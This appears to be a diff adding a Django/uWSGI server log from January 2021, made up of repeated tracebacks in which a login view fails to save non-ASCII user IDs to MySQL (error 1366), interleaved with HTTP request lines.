+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 654/810] 219.228.146.253 () {48 vars in 916 bytes} [Thu Jan 14 08:06:21 2021] POST /login/ => generated 209363 bytes in 136 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 655/811] 180.160.63.35 () {36 vars in 695 bytes} [Thu Jan 14 08:09:48 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 656/812] 180.160.63.35 () {36 vars in 697 bytes} [Thu Jan 14 08:09:48 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: -1|req: -1/813] 180.160.63.35 () {38 vars in 720 bytes} [Thu Jan 14 08:09:48 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/814] 180.160.63.35 () {38 vars in 742 bytes} [Thu Jan 14 08:09:48 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/815] 180.160.63.35 () {38 vars in 724 bytes} [Thu Jan 14 08:09:48 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/816] 180.160.63.35 () {38 vars in 722 bytes} [Thu Jan 14 08:09:48 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/817] 180.160.63.35 () {38 vars in 728 bytes} [Thu Jan 14 08:09:48 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/818] 180.160.63.35 () {38 vars in 703 bytes} [Thu Jan 14 08:09:48 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/819] 180.160.63.35 () {38 vars in 701 bytes} [Thu Jan 14 08:09:48 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/820] 180.160.63.35 () {38 vars in 717 bytes} [Thu Jan 14 08:09:48 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/821] 180.160.63.35 () {38 vars in 719 bytes} [Thu Jan 14 08:09:48 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/822] 180.160.63.35 () {38 vars in 709 bytes} [Thu Jan 14 08:09:49 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/823] 180.160.63.35 () {38 vars in 774 bytes} [Thu Jan 14 08:09:51 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/824] 180.160.63.35 () {38 vars in 748 bytes} [Thu Jan 14 08:09:51 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x9F\\xE6\\x9C\\xAB...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x9F\\xE6\\x9C\\xAB...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 657/825] 180.160.63.35 () {48 vars in 919 bytes} [Thu Jan 14 08:10:13 2021] POST /login/ => generated 209237 bytes in 129 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x9F\\xE6\\x9C\\xAB...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x9F\\xE6\\x9C\\xAB...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 658/826] 180.160.63.35 () {48 vars in 919 bytes} [Thu Jan 14 08:10:32 2021] POST /login/ => generated 209237 bytes in 127 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x9F\\xE6\\x9C\\xAB...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x9F\\xE6\\x9C\\xAB...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 659/827] 180.160.63.35 () {48 vars in 919 bytes} [Thu Jan 14 08:10:58 2021] POST /login/ => generated 209237 bytes in 121 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x9F\\xE6\\x9C\\xAB...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
